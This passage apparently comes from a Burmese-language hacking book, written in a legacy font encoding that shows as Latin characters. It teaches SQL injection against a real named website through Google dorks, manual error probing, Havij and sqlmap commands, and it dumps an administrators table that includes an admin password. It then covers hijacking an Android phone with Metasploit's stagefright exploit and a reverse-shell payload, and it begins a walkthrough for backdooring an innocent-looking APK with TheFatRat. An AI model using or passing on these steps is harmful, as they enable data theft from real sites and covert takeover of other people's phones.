vlodtrsm;qHk; jzpfwJh .php?id= any number qdkwJh yHkpHav;udk a&S;OD;pGm
azmfjyay;oGm;ygr,f/

txufyg yHkrSm Munfh&if Google search rSm .php?id= qdkwmudk &SmazGjy

xm;wmudk awGYjrif&rSmyg/ result taeeJY odef;aygif; wpfaomif;av;axmifausmf
awGY&Sdvmygw,f/ 'DxJrSm tJonf Vulnerability &Sdw,faygh/

txufygyHkrSmawmh uRefawmfhtaeeJY Target website wpfckcsif;pDu

Vulnerability udk &SmazGjyxm;ygw,f/ Advanced Google Search rSm azmfjyjyD;
jzpfvdkY inurl: udkawmh odjyD; jzpfr,fxifygw,f/ inurl:bible-history.com vdkY
a&;xm;wJhtwGuf uRefawmf &SmazGvdkwJh Website onf bible-history.com udk
OD;wnfjyD; &SmazGygw,f/ bible-history.com xJurS .phi?id= ygwmawGudk a&G;cs,f
&SmazGvdkufwmyg/ yxryHkeJY rwlwJhtcsufu rdrd target udk owfrSwf
&SmazGvdkufwmjzpfvdkY result usOf;oGm;ygw,f/ 1420 yJ &vmwmudk awGY&rSmyg/ 'g
oufqdkif&m website wpfckwnf;rSm jzpfvdkY uRefawmfwdkYtwGuf ydkjyD; xda&mufrI
&Sdygw,f/

olY&JU Vulnerability yHkpHyg/ any number qdkawmh aemufu udef;*Pef;

onf bmyJ jzpfjzpfvdkY ,lq&rSmjzpfygw,f/ uJtajzawGxJudk MunfhMunfhvdkuf
&atmif/

yxrqHk; result udk erlem Munfh&atmif/ url u

www.bible-history.com/subcat.php?id=2 jzpfygw,f/ .php?id=2 qdkawmh
yHkpHt&jyefMunfh&if .php?id= any number format twdkif; jzpfygw,f/ Browser
rSm &SmMunfh&if URL udk tpdrf;a&mifeJY azmfjyxm;wm awGY&ygr,f/ tJonf link
udkyJ click jyD; zGifhvdkuf&atmifAsm/

yHkrSmawmh Web browser wpfckvHk; r[kwfayr,fh URL eJY website

udkawmh jrifawGY&rSmjzpfygw,f/

yHkxJutwdkif; Vulnerable URL &JU aemufrSm ' (apostrophe) udk

xnfhoGif;jyD; Enter vdkufyg/

txufygyHktwdkif; awGY&rSm jzpfygw,f/ pmom;awGudkcsnf; azmfjyay;

ygr,f/ Query failed : You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to
use near ''' at line 1 qdkjyD; awGY&ygw,f/ 'gqdk&ifawmh 'D Vulnerability udk
wdkufcdkufvdkY &jyDvdkY ,lqEdkifygw,f/ 'ghjyif result taeeJY bmrQ ray:bJ
tjzLa&mif tuGufom jrifae&ygvsifvnf; 'gudktoHk;jyKjyD; wdkufcdkufvdkY &r,fvdkY
rSwf,lEdkifygw,f/ olY&JU Website xJrSm &SdaewJhtaMumif;t&m wpfckck
yGifhvmcJhw,f qdk&ifawmh 'gudk toHk;jyKjyD; wdkufcdkufEdkifr,fh vrf;aMumif;awGudk
umuG,fxm;jyD;jyDvdkY ,lq&rSmyg/
txufyg yHkpHrSm uRefawmf oHk;cJhwJh Vulnerable keyword u .php?id=
jzpfygw,f/ 'gwifyJvm;qdk&ifawmh r[kwfao;ygbl;/ tJovdk keyword awGudk
pkpnf;xm;wmav; &Sdygao;w,f/ Google Dork vdkY ac:qdkygw,f/
bit.ly/7000gglist rSm oGm;a&muf Munfh&IEdkifygw,f/ uRefawmfwdkY&JU Browser rSm
bit.ly/7000gglist vdkY &dkufjyD; Enter vdkufyg/
 tJonfrSm Vulnerable keyword aygif;rsm;pGmudk uRefawmfwdkY awGYjrif&
rSm jzpfygw,f/ tqdkyg list awGudk download vnf; &,lxm;Edkifygao;w,f/
wpfck rSmMum;vdkwmu SQL vulnerable awGudk jyifqifz,f&Sm;jyD;oGm;csdefrSmawmh
tajctaecsif; uGmjcm;rI &SdEdkifygw,f/ 'gaMumifh ,ck uRefawmf vufawGY
vkyfjywJh website onf pmzwfolwdkY vdkufvkyfwJhtcg rwlwmrsdK; jzpfaeEdkifygw,f
qdkwm BudKwif ajymjyxm;yg&apcifAs/ ck vkyfaqmifjywJh enf;vrf;awGudk
enf;vrf; tjzpfom rSwf,ljyD; b,fvdkvkyfoGm;w,fqdkwmudkom rSwfxm;ay;yg/
uRefawmf prf;oyfjyr,fh Vulnerability awGudk Website owner awGu jyefvnf
jyifqifjyD;oGm;wJhtcg ,ck Vulnerability ay: toHk;jyKvdkY &rSm r[kwfawmhvdkYygyJ/
tjcm; site wpfck ajymif;&Sm&rSmaygh :)
uJ uRefawmf cke .hp?id= oHk;jyD; &Smjyxm;wJh vulnerable website xJuyJ
manual taeeJY qufjyD; vkyfaqmifp&mav;awGudk aqG;aEG;&atmifyg/ column
&SmwJhtydkif;udk qufjyD; aqmif&Guf&atmif/ tay:rSm uRefawmfwdkYtaeeJY SQL
vulnerable URL &JUaemufrSm apostrophe udk xnfhjyD; prf;cJhpOfu vulnerable udk
toHk;csvdkY &w,fqdkwm odcJh&jyD;jyDrdkY tqdkyg URL xJuae column udk qufjyD;
&SmEdkifzdkY vdktyfygw,f/

rlv vulnerable jzpfaewJh URL udk jyefoGm;vdkufyg/ (xyfxnfhxm;wJh

apostrophe udk jzKwfjyD; jyef Enter vdkuf&if &ygjyD/)

uRefawmfwdkY &SmazGvdkwJh Column udk &&SdzdkYtwGuf rl&if; vdyfpm&JU

aemufrSm Order by 1-- qdkjyD; &SmMunfhEdkifygw,f/ 1 r&&if 2 ajymif;&Smygr,f/
tJovdkeJY error wufvmwJhtxd &Smay;&rSmjzpfygw,f/ ck erlemrSmawmh URL u
www.bible-history.com/subcat.php?id=2 jzpfygw,f/ olYaemufu Order by 1--
xyfxnfhwJhtcg www.bible-history.com/subcat.php?id=2 Order by 1-- qdkjyD;
jzpfoGm;ygr,f/ error rawGYao;wmaMumifh URL u 1 ae&mrSm 2 xnfhjyD; enter
ygr,f/
 'Dae&mrSmawmh vG,fvG,fulygyJ/ 2 a&mufwJhtcg Query failed : qdkjyD;
p awGYawmhwmygyJ/ (tjcm;aom site awGrSm 'Dwdkif; wlnDEdkifrSmr[kwfyg)/ tay:
yHkrSm jyefMunfh&if Unknown column '2' qdkjyD; awGYjrif&rSmyg/ 'gav;udk
pOf;pm;&atmif/ Unknown column '2' qdkawmh column 2 r&Sdbl;^rodbl; qdkwJh
t"dyÜg,fyg/ Column 2 txd r&Sdbl;qdkawmh 2 atmufu 1 jzpfygw,f/ 'gqdk
column 1 yJ &Sdwmaygh/ 'Dvdk rSwfxm;Edkifygw,f/ (tu,fí pmzwfolwdkY &SmazGr,fh
site rSm Order by 6-- rSm error awGYr,f qdkygpdkY/ 'gqdk column 6 r&Sdbl;vdkY
owfrSwf&rSmjzpfvdkY b,fxd&SdrvJqdk 5 xdaygh/ error column xJu wpfck
avQmhvdkuf&Hkyg/
ydkjyD;em;vnfatmif aemufxyf Oyrmav;wpfck Munfh&atmif/

txufygyHkrSm URL udk Munfh&if .php?id=200 vdkY jrif&wJhtwGuf

Vulnerability &Sdw,fvdkY odEdkifjyD; SQL inject vkyfEdkifzdkY &SmMunfhwJhtaeeJY
apostrophe xnfhjyD; &SmMunfhwJhtcg Error wufvmwmudk awGY&rSmyg/ 'gqdk olYudk
toHk;csvdkY &jyDaygh/

rl&if; URL &JU aemufrSm Order by 1-- xnfhoGif; &SmazG Munfhygw,f/

error rawGY&ao;ygbl;/ 1, 2, 3, 4, ... qufjyD; &Smvdkufygw,f/
 tqifhqifh wdk;jyD; &SmvdkufwJhtcg column 13 rSm Unknown column
awGY&ygw,f/ column 13 r&Sdbl;qdkawmh olYrSm &Sdwmonf column 12 xdaygh/ 'gqdk
em;vnfjyD xifygw,f/

Havij (Windows)
uRefawmfwdkYtaeeJY SQL injection vkyf&mrSm toHk;jyKEdkifr,fh Tool awG
&Sdygw,f/ Windows rSm oHk;EdkifwJh Tool ESpfckudk t&ifqHk; azmfjyay;ygr,f/ yxr
wpfcku Havij yg/ bit.ly/havijexe (password havijpro) uae a'gif;,lEdkifygw,f/
(xHk;pHtwdkif; App awGudk pkay;xm;wJh page rSmvnf; oGm;a&muf
&,lEdkifygw,fcifAsm)

Havij udk zGifhvdkufjyD;aemuf Target ae&mrSm uRefawmfwdkY Victim

website &JU Vulnerable URL udk xnfhoGif;jyD; Analyze udk ESdyfvdkuf&if Analyzing
vkyfaewmudk awGYjrif&ygr,f/ Analyze cvkwfav; jyefay:vmjyDqdk&ifawmh
analyzing jyD;qHk;jyD jzpfygw,f/

Info uae Get udk ESdyfjyD; qufvuf vkyfaqmifEdkifygw,f/ uRefawmfu

awmh 'D Chapter wpfckvHk;rSm bible-history.com wpfckwnf;udkom OD;wnf
vkyfaqmifjyoGm;rSmjzpfygw,f/

txufyg yHktwdkif; Get cvkwfav; jyefay:vmjyDqdk&ifawmh info awG

&&SdjyD jzpfygw,f/

Tables uae Get DBs udk ESdyfjyD; Database awGudk &,lEdkifygw,f/

yHkrSmawmh database awGudk &,ljyD;jzpfygw,f/ tJonfxJurS yxrqHk; Database
jzpfwJh bible_history udk select vkyfxm;ygw,f/ (usefwmawGudkawmh aemufrS
wpfckpD ajymif;&Smygr,f/)/ jyD;&if Get Tables udk ESdyfjyD; Table awG &,l&ygr,f/

txufyg yHkrSm Munfh&if bible_history qdkwJh Database xJrSm yg0ifwJh

Table awGudk awGYjrif&rSmjzpfygw,f/ wpfckcsif;pD &Sm&rSmjzpfjyD; uRefawmfuawmh
erlem jyjcif;rdkY wpfckpDyJ jyoGm;ygr,f/ usefwJhtydkif;awGudkawmh rdrdwdkYbmom
vufawGY vkyfMunfhwm ydkaumif;ygvdrfhr,f/ txufygyHktwdkif;ygyJ/ bible_history
qdkwJh database xJu Email qdkwJh table udk a&G;jyD; column udk ESdyfygr,f/ column
quf&Smr,faygh/

tqifhqifh&SmoGm;wJhtcg column awG awGY&jyDjzpfjyD; column wpfckudk

a&G;jyD; Get Data udk ESdyfvdkufygw,f/
'gu tqifhqifh vkyfaqmifoGm;yHkav;yg/ 'Dtqifhav;awGudk
jyefMunfh&atmif/ uRefawmfwdkY vkyfaqmifcJhwmawGonf 1/ search udk oHk;jyD;
uRefawmfwdkY Target rSm SQL vulnerability &Sd r&Sd &SmazGppfaq;cJhMuygw,f/
vulnerable URL awGY&if ul;,lcJhMuygw,f/ 2/ tJonf vulnerable URL uae
database &Smygw,f/ 3/ table &Smygw,f/ 4/ column &Smygw,f/ tJonfuaerS
data awGudk &,lygw,f/ 'Dawmh 'Dtqifhav;awGudk vkyfaqmif&w,fqdkwm
rSwfxm;&ygr,f/
 Database A wpfckwnf;rSm Table awGu oHk;ck&Sdw,f qdkygpdkY/ Table
wpfckcsif;pDrSm column oHk;ckpD &Sdw,f qdkygpdkY/
'gqdk uRefawmfwdkY vkyfaqmif&SmazG
&r,fhtydkif;onf 9 ydkif; (9rsdK;) &SmazG&rSmjzpfygw,f/ vufawGYrSm 'Dhxuf
ydkrsm;ygvdrhfr,f/ 'gawmif Database A wpfckwnf;udkom erlem jyxm;ao;wmyg/
B,C wdkYrSmvnf; oufqdkif&mtvdkuf Table q,fckpDavmuf &SdaeEdkifjyD; table
wpfckpDrSm column aygif;rsm;pGm xyf&SdaeEdkifwJhtwGuf DB wpfcktwGif;rSmwif
&SmazG&r,fhtydkif; rsm;pGmudk awGYjrif&rSmyg/ ae&mwdkif;rSm uRefawmfwdkY vdkcsifwJh
tcsuftvufawG &SdaeMurSmr[kwfygbl;/ 'gaMumifh uRefawmfwdkYrSm tvG,fwul
ZGJravSsmhwwfzdkY vdktyfwm jzpfygw,f/

Windows rSm toHk;jyKEdkifwJh aemufxyf Tool wpfcku BSQL Hacker

tool jzpfygw,f/ Target URL rSm rdrdwdkY&JU target website udk xnfhoGif;jyD;
Automated Attack udk a&G;cs,fum Start ESdyf pwifEdkifygw,f/ 'Dae&mrSmawmh
tao;pdwf razmfjyawmhygbl;/ Kali Linux rSm vkyfaqmifyHkudk quf&atmifyg/
SQLmap
Kali Linux rSm build-in yg0ifjyD;om;jzpfwJh SQL map udk toHk;jyKjyD;
erlem vkyfaqmifMunfh&atmifyg/

Terminal udk zGifhygr,f/ uRefawmfoHk;oGm;wmav;awGu sqlmap -u (url)

--dbs yg/ sqlmap u SQL map udk toHk;jyKr,fvdkY qdkvdkwmyg/ -u uawmh
aemufrSm vulnerable URL udk xnfhr,fvdkY qdkvdkygw,f/ uRefawmfuawmh Target
xm;xm;wJh bible-history.com udkyJ erlem azmfjyay;xm;ygw,f/ --dbs uawmh
db = Database, s = search (database search) jzpfygw,f/ Windows app
rSmwkef;u Havij eJY vkyfaqmifcJhwJh tqifhawGtwdkif;ygyJ/ vulnerable URL udk
&Smw,f/ jyD;awmh oluaewpfqifh Database &Smygw,f/

Database &SmazGMunfhvdkufawmh bible_glossary, bible_history,

information_schema, keywords eJY kidsdict qdkjyD; database 5ck awGYjrif&ygw,f/
database &SmazGjyD;oGm;jyDrdkYvdkY wpfckcsif;pDudk toHk;jyKjyD; quf&SmoGm;ygr,f/ ck
'Dae&mrSmawmh database ig;ckxJurS 'kwd,ajrmuf bible_history udk &Smjyygr,f/
(wu,fqdk&ifawmh tm;vHk;udk wpfckpD &Sm&rSmyg/ 1 rSm tukef&Sm rawGY&if 2
aygh?)/ uRefawmfuawmh wpfckpD &Smrjyawmhbl;aemf/ oabmu wlnDaewmrdkYvdkY
wpfckyJ erlem jyygr,f/

yxr command u sqlmap -u (URL) --dbs eJY database &SmcJhwmyg/

ckawmh Database awGudk od&SdoGm;jyDjzpfvdkY --dbs ae&mrSm -D udk ajymif;oHk;ygr,f/
-D &JUaemufrSm uRefawmf toHk;jyKr,fh database udk xnfhoGif;ygw,f/
uRefawmfoHk;rSmu bible_history yg/ database odjyDqdk&if quf&Sm&rSmu table
jzpfwJhtwGuf --tables udk toHk;jyKjyD; table search vkyf&ygOD;r,f/ 'gaMumifh
txufygyHkrSm uRefawmfoHk;vdkufwJh command onf sqlmap -u (URL) -D
(Database) --tables jzpfygw,f/

txufygyHkrSmMunfh&if bible_history qdkwJh Database xJrSm table aygif;

2 ckudk awGYjrif&ygr,f/ tJonfxJu wpfckpDudk qufjyD; &Sm&ygOD;r,f/ :) rsm;awmh
rrsm;ygbl;aem/

'DtqifhrSm tables awGxJurS administrators qdkwJh table udk

toHk;jyKygoGm;ygr,f/ (wpfckpDvkyfaqmifMunfh&rSmjzpfygw,f)/ tay:yHkrSm
uRefawmfoHk;cJhwJh command udk Munfh&atmifyg/
sqlmap -u (url) -D (database) -T (table name) --columns jzpfygw,f/
database odjyD? table odjyDjzpfvdkY column search (--columns) udk
toHk;jyK&SmazGwmyg/ bmawG &vmrvJ Munfh&atmif/
 uRefawmf&Smvdkufwmu bible_history (database) xJu administrators
(table) xJrSm jzpfygw,f/ Munfhvdkufawmh column ig;ck xGufay:vmudk
awGYjrif&rSmyg/

txufygyHkrSm uRefawmf oHk;oGm;wmu sqlmap -u (url) -D (database)

-t (table name) -C (column name) --dump yg/ 'Dae&mrSmawmh uRefawmfu
admin_password qdkwJh column udk toHk;jyKcJhwmjzpfygw,f/

&v'ftaeeJYuawmh bible_history (database) xJu administrators

(table) xJrSm&SdwJh admin_password (column) rSm Mos3s qdkwJh info wpfckudk
&&Sdvdkufygw,f/
'Dtqifhtxd vkyfaqmifcJhwmav;awGudk jyefMunfh&if database
rodcifrSm --dbs udkoHk;jyD; database search vkyfcJhayr,fh database awG odoGm;vdkY
wpfckck xnfh&SmwJhtcgrSmawmh --dbs tpm; -D udkoHk;cJhwm awGY&ygr,f/ table
search (--tables) eJY column search (--columns) awGae&mrSmvnf; xdkYtwlygyJ/
-T eJY -C (tBuD;pmvHk;) awGudk ajymif;oHk;cJhwmyg/ wpfqifhpDoGm;wmjzpfvdkY
rSwfrdvG,fygw,f/ wu,fwrf;awmh SQL injection techniques awGonf
tvGefus,fjyefYjyD; aqG;aEG;p&m rsm;pGm &Sdaeygw,f/
'DtaMumif;t&meJY ywfoufjyD; Web Basic & SQL Injection qdkwJh
pmtkyfav;wpftkyf xyfrH a&;om;oGm;ygr,f/ pmrsufESm 600 ausmf &Sdygr,f/
a&;om;zdkYawmh tcsdef tawmfMumMum ,l&rSmjzpfvdkY Mumawmh MumEdkifygw,f
cifAsm/ tjcm; odoifhwmawGudkvnf; Facebook Secret Group rSm
wifay;oGm;ygOD;r,fcifAsm/ 'D Chapter uav;udkawmh 'Dae&mrSmyJ &yfem;cGifh
jyKygcifAsm/ aemufxyf Chapter wpfckrSm jyefvnf qHkawGY&atmifygcifAsm/
CHAPTER 23: Mobile Hacking

Introduction

acgif;pOfMunfh&HkeJY tm;vHk; em;vnfEdkifwJh taMumif;t&mrdkY txl;taxG

azmfjyrdwfqufaep&m rvdkawmhygbl;aemf/ ,aeYacwfrSm uRefawmfwdkYtm;vHk;vdkvdk
eJY aeYpOfrjywf xdawGYae&wJh t&mwpfcku mobile zkef;awG jzpfMuygw,f/
uGefysLwm vlwdkif;rSm r&Sdayr,fh zkef;av;awGawmh tm;vHk;vdkvdkrSm &SdaeMuwmudk
Munfh&if rdkbdkif;zkef; oHk;pGJolawG&JU yrmPudk rSef;q MunfhEdkifygw,f/
rdkbdkif;zkef; oHkpGJolOD;a& rsm;jym;vmwmeJYtrQ rdkbdkif;zkef;awG&JU
vHkjcHKa&;pepfonf pdefac:rIwpf&yf jzpfvmygawmhw,f/ 2014 rSmuwnf;u
urÇmhvlOD;a& &Sdwmxuf ydkrdkwJh rdkbdkif;zkef;ta&twGufudk tHhMowBuD; odcJhMu&jyD;
ygjyD/ ,aeY 2017 rSmqdk&ifawmh txl;qdkzG,f&myif r&Sdawmhyg/
'gawGxuf ydkjyD; tm&Hkpl;pdkufapwmuawmh Apple store uae
tcaMu;aiG ay;jyD;0,f,l&wJh Application awG? Google Play Store uae
tcaMu;aiGeJY 0,f&wJh Application awG? Application tcrJh&ayr,fh vdktyfwJh
wefqmyvmawGeJY level awG jrefjrefwufEdkifzdkY aiGay;0,f,l&wJh Game awG
pwmawGuvnf; rdkbdkif;zkef;awGuae &,laeEdkifMuygw,f/ 'gwifru Facebook
vdk Social Media awGrSm Ads vdk aMumfjim0efaqmifrIawGudk toHk;jyKMuwJhtwGuf
aiGaMu;qdkif&m tcsuftvufawGudkvnf; zkef;awGxJrSm jznfhxm;Mu&jyefygw,f/
txufygtajctaeawGt& rdkbdkif;zkef;awGbufudk Attacker awG&JU
ajcOD;vnfvmapygawmhw,f/ zkef;awGxJu tcsuftvufawGudk &,lzdkY enf;rsdK;pHk
BudK;pm;vmMuovdk zkef;xJrSm toHk;jyKvmaeMuwJh Mobile Banking awG?
iBanking awGeJY zkef;xJrSm oHk;EdkifwJh tjcm;aom aiGaMu;qdkif&m tcsuftvufawG
udk malicious hacker awGu &,lpkaqmif;EdkifzdkYtwGuf enf;rsdK;pHkeJY
zefwD;vkyfaqmifvmMuygw,f/ 18+ vdk Website awGudk Free 0ifMunfhEdkifatmif
zefwD;ay;xm;jyD; Browser uaewpfqifh tcsuftvufawG &,lEdkifzdkY BudK;pm;vm
Muygw,f/ Application aygif; rsm;pGm zefwD;jyD; rdkbdkif;zkef; toHk;jyKolawGxHu
tcsuftvufawGudk &atmifBudK;pm;vmMuygw,f/ 'gaMumifh rdkbdkif;zkef;
toHk;jyKolawGtaeeJY rdrdwdkY zkef;awGudk vHkjcHKrI&SdapzdkYtwGuf *&kjyKoifhygw,f/

Area of Consider
uRefawmfwdkYawG&JU rdkbdkif;zkef;awGay: xm;&SdwJh cHpm;csufawGtvdkuf
rdkbdkif;zkef;awGonf w&dyf&dyf wd;k wufvsuf &SdaeMuygw,f/ uRefawmfwdkY&JU zkef;rSm
&SdaewJh tEå&m,fjzpfapEdkifwJh tcsufawGudk pOf;pm;Munfh&atmifyg/
'DvdkpOf;pm;wJhtcg yxrqHk; xnfhawG;&r,fhtcsufu uRefawmfwdkY&JU
rdkbdkif;zkef;awG&JU vHkjcHKrIygyJ/ vHkjcHKrIudk xdcdkufEdkifacsawGtaeeJY zkef;aysmufoGm;wm?
zkef;cdk;cH&wm? wireless access point wpfckckeJY csdwfqufae&wm? USB cable BudK;eJY
tm;oGif;ae&wm pwmawG jzpfygw,f/
aemufwpfcsuf uRefawmfwdkY pOf;pm;&rSmu application security yg/
uRefawmfwdkY&JU rdkbdkif;zkef;awGxJrSm xnfhoGif;xm;wJh application awGeJY
yufoufwJh pdk;&drfp&mtcsuftvufawGudkvnf; xnfhwGuf&ygr,f/ tcsdKUaom
Application awGonf uRefawmfwdkYxHrS user information awGudk
cdk;,laeMuw,fqdkwm Threat Report awGudk avhvmjcif;jzifh od&SdEdkifygw,f/
xdkodkYaom Application awGonf unauthorized application store awGuae
trsm;qHk; &&SdEdkifw,fqdkayr,fh Google Play Store vdk ,HkMunfpdwfcs&ygw,f
qdkwJh Application Store rSmawmifrS awGY&wwfygao;w,f/
'gawGtjyif wifi, bluetooth wdkYvdk wireless enf;ynmawGudkyg
zkef;awGxJrSm xnfhoGif;toHk;jyKvmwmaMumifh wireless security udkyg
owdxm;&r,fhtxJrSm xnfhoGif;pOf;pm;&rSm jzpfygw,f/ aemufwpfcku
uRefawmfwdkY toHk;jyKaewJh Application awG&JU permission yg/ ,HkMunfpdwfcs&rI
r&SdwJh application awGudk permission ay;&mrSm owdjyKoifhygw,f/ Facebook,
Messenger, Viber wdkYvdk Application awGrSm Camera wdkY? Gallery wdkYudk
Permission awmif;wmudk vufcHay;vdkY&ayr,fh omref zkef;ayghatmif &Sif;ay;
w,fqdkwJh Application awGrSm camera, audio, gallery pwJh Access awGudk
awmif;cHaew,f&ifawmh 'gpOf;pm;p&m jzpfoGm;ygjyD/ Android Hacking udk
vufawGYav; enf;enf; vkyfMunfh&atmifyg/

Hacking Android Using Metasploit

yxrqHk;taeeJY uRefawmfwdkY&JU Kali Linux Terminal rSm msfconsole vdkY
&dkufxnfhvdkufyg/ Metasploit Framework Console udk twdkac:qdkwmyg/
Metasploit Basic tcef;rSm tao;pdwfazmfjycsufawGudk xnfhoGif;ay;oGm;ygr,f/
 txufygtwdkif; msf> xJudk a&muf&SdoGm;rSmjzpfygw,f/

txufygtwdkif; android exploit awGxJu stagefright udk

toHk;jyKvdkufygw,f/

txufygtwdkif; stagefright xJudk a&muf&SdoGm;wm jrif&ygr,f/ show

options azmfMunfhEdkifygw,f/

yHkrSmMunfh&if SRVHOST rSm zero awG jzpfaewmudk awGY&ygr,f/

tJonfae&mrSm uRefawmfwdkY&JU IP address udk xnfhoGif;&atmifcifAs/

txufygtwdkif; SRVHOST udk uRefawmfwdkY&JU IP address

owfrSwfvdkufygw,f/ Enter vdkufyg/

txufygtwdkif; URIPATH udk / (root system) owfrSwfay;vdkufyg/

aemufwpfaMumif;rSm set PAYLOAD owfrSwfay;&ygr,f/ 'Dae&mrSm

uRefawmfu linux/armle/metetpreter/reverse_tcp udk Payload owfrSwfvdkuf
ygw,f/

jyefMunfh&if txufygyHkpHtwdkif; awGY&rSmyg/ aemufwpfBudrf show

options ac:Munfhyg/

txufygtwdkif; Payload Options wpfck xyfwdk;vmwmudk

awGY&ygr,f/ LHOST rSm current column rSm uGufvyfjzpfaeygw,f/
uRefawmfwdky&JU IP eJY jznfh&ygr,f/

txufygtwdkif; set LHOST eJY IP address udk jznfhoGif;vdkufygw,f/

Verbose true owfrSwfay;vdkufygw,f/ ckaerSm show options

udk
jyefMunfhr,fqdk&if LHOST rSm IP address eJY awGYjrif&jyDjzpfygw,f/
 exploit -j eJY exploit udk pwifvdkufygw,f/ txufyg yHkrSmMunfh&if
URL : http://192.168.43.150:8080/ udk uRefawmfwdkY&JU target xH ay;ydkY&rSmyg/
Target u tqdkyg link udk ESdyfrdjyDqdk&ifawmh (ESdyf&Hk ESdyfrdjyDqdkwmeJY)
atmufygtwdkif; jrif&ygr,f/

uRefawmfuawmh Target udk Android 7.0 eJY prf;jyxm;ygw,f/

txufygyHkrSmMunfh&if target &JU Android version udk awGYjrif&rSmyg/ Target rSm
vuf&Sd oHk;aewJh Mobile Browser u Xiaomi &JU MIUI browser jzpfw,fqdkwmyg
awGYjrif&ygr,f/ (atmufygtqifhawGuawmh tjcm; zkef;wpfvHk;eJY prf;oyfxm;
wmawG jzpfygw,f/)

uRefawmfh&JU Target device eJY Active session wpfck xlaxmifEdkifjyD

qdk&ifawmh meterpreter session (1) opend qdkjyD; jrifawGY&ygr,f/ uRefawmfh&JU IP
address u 192.168.43.150 yg/ vuf&Sd ay;ydkYvdkufwJh target mobile &JU address u
192.168.43.2 yg/ 'gudk Munfhjcif;tm;jzifh uRefawmfwdkYonf same network
wpfckwnf;rSm &SdaeMuw,f qdkwmudk od&SdEdkifygw,f/ tu,fí 'D Attack udk
Same network rSmom r[kwfbJ WAN taeeJY (rdrdeJY network csif; wlwl rwlwl)
toHk;jyKEdkifvdkygvsifawmh Port Forwarding udk vkyfaqmifwwf&ygr,f/
 Active session wpfck xlaxmifEdkifjyD qdk&ifawmh sessions -l command
udk toHk;jyKjyD; azmfMunfhEdkifygw,f/

tay:u yHkrSm Session list azmfMunfhawmh ID rSm 1 wpfckyJ

awGYcJhygw,f/ 'gaMumifh uRefawmfu sessions -i 1 eJY session id
a&G;cs,fay;vdkufygw,f/

jyD;&ifawmh txufygyHktwdkif; sysinfo udk toHk;jyKjyD; victim &JU System

information udk MunfhEdkifygw,f/ txufyg vkyfaqmifcsufonf security
tm;enf;aom Android rsm;wGifom wdkuf&dkuf csdwfqufEdkifwmjzpfjyD; vHkjcHKrI
ydkaumif;wJh Android awGtwGufawmh tqifrajywmrsdK; &SdEdkifygw,f/ tJvdk
tajctaersdK; BuHKygu link rSm 8080 tpm; 4444 udk ajymif;ay;&ygr,f/

meterpreter
xJa&mufjyD b,fvdk arTaESmuf&r,fqdkwm rod&ifawmh
help av; &dkufac:jyD; command awGeJY azmfjycsuf(Description) awGudk
MunfhEdkifygw,f/

msf xJrSm Android eJY qdkifwJh payload awGudk txufygyHkpHtwdkif;

&SmazG Edkifygw,f/

meterpreter payload oD;oefYom &SmazGvdkygu txufygtwdkif;

&SmazGEdkifygw,f/ shell oD;oefYtwGufom &Smcsif&ifawmh meterpreter ae&m shell
ajymif;jyD; &Smaygh/
Metasploit Framework
taMumif;udk Metasploit Framework
tcef;a&mufrSom qufjyD; azmfjyaqG;aEG;ygr,f/ metasploit payload awGudk
Munfh&if Android twGufvnf; awmfawmfrsm;rsm;av; &Sdwmudk awGY&rSmyg/

The Fat Rat installation on Kali Linux

txufyg command udk toHk;jyKjyD; TheFatRat udk &,lyg/ TheFatRat

qdkwm hacking vkyf&mrSm rsm;pGm toHk;0ifwJh Program wpfckjzpfjyD; Android
hacking vkyf&mrSm tultnDaumif;pGm ay;EdkifwJh tool awG yg0ifygw,f/

100% jynfhjyDqdk&ifawmh TheFatRat udk clone vkyfvdkY jyDqHk;jyDjzpfygw,f/

cd TheFatRat eJY the fat rat folder xJudk qufvuf 0ifa&mufyg/

ls
eJY List xkwfMunfhr,f qdk&ifawmh setup.sh qdkwJh zdkifav;udk
awGYjrif&ygr,f/ .sh zdkifjzpfvdkY ./ eJY run &r,fqdkwmudk odEdkifygw,f/

'Dwdkif;yJ run r,fqdk&ifawmh txufygtwdkif; Permission denied

qdkwmyJ awGYjrif&rSmyg/ uRefawmfwdkY oHk;r,fh program file udk executable
permission (x) aygif;xnfhay;zdkY vdkygw,f/ (aemufydkif; udk,fhbmom install
vkyf&r,fhtcg odaeatmif xyfajymjyjcif;yg/)
 ckqdk&ifawmh setup.sh file udk run EdkifygjyD/ Install wJhtcg XTerm
(terminal window) tao;av;wpfckpD wufvmygr,f/ ydwfrypf&ygbl;/ 100%
jynfhatmif apmifh&rSmyg/ tifwmeuf connection vnf; vdktyfygw,f/ shortcut
create twGuf y/n ar;vm&ifawmh y ajzvdkufyg/ 'gqdk&if Terminal rSm
b,fae&myJa&mufaeae fatrat vdkY &dkufac:vdkufwmeJY ay:vmrSmjzpfygw,f/

fatrat vdkY &dkufac:vdkufwJhtcgrSmawmh txufygtwdkif; main menu udk

jrifawGY&rSmjzpfygw,f/ yHkrSmMunfh&if main menu options 16ck &Sdaewmudk
awGY&rSmyg/

uRefawmfu apk zdkifxJudk backdoor xnfhoGif;rSmrdkYvdkY 5 udk a&G;cs,fvdkuf

ygw,f/

txufygtwdkif; LHOST IP jznfhoGif;cdkif;wJhae&m a&mufygr,f/ IPV4

address qdkwmudk jyay;xm;wJhtwGuf rdrd address rdrd odEdkifygw,f/ 'gayr,fh
uRefawmfwdkY odxm;wJhtwdkif; 'gu same network rSmyJ oHk;vdkY &wmyg/
uRefawmfwdkYu 'DhxufydkjyD; us,fus,fjyefYjyefYoHk;csifwm/ wpfenf;tm;jzifh tjcm;
euf0yfrSmoHk;aewJholawGudkyg 'Denf;vrf;eJY &apcsifwm/ 'Dawmh Port Forward
vkyfjyD; xnfhoGif;zdkY vdkygw,f/ Port Forwarding tcef; oD;oefY yg&Sdygw,f/
uRefawmfuawmh tcp port 1234 eJY forward vkyfxm;wJh tcp forwarding address
udk xnfhoHk;vdkufygr,f/ pm&IolwdkYtaeeJYuawmh Port Forwarding
tcef;ra&mufcif prf;oyfvdkygu acwåausmfMunfhEdkifygw,fcifAsm/

uRefawmfuawmh LHOST eJY LPORT udk xnfhoGif;jyD; jzpfygw,f/

aemufwpfqifhu File Path (zdkifwnfae&meJY zdkifemrnftjynfhtpHk)

a&G;ay;&rSmcifAs/ uRefawmfhrSmawmh Desktop ay:rSm Happy_Birthday.apk qdkwJh
Android application zdkifav; &SdwmrdkY tJ'gudkyJ xnfhoHk;vdkufygw,f/
zdkifemrnfawG &dkufwJhtcg rrSm;ygapeJY/ pm&IolwdkYtaeeJYuawmh rdrdwdkY victim
oabmusr,fh *drf;av;awGjzpfap tjcm; application av;awGudk
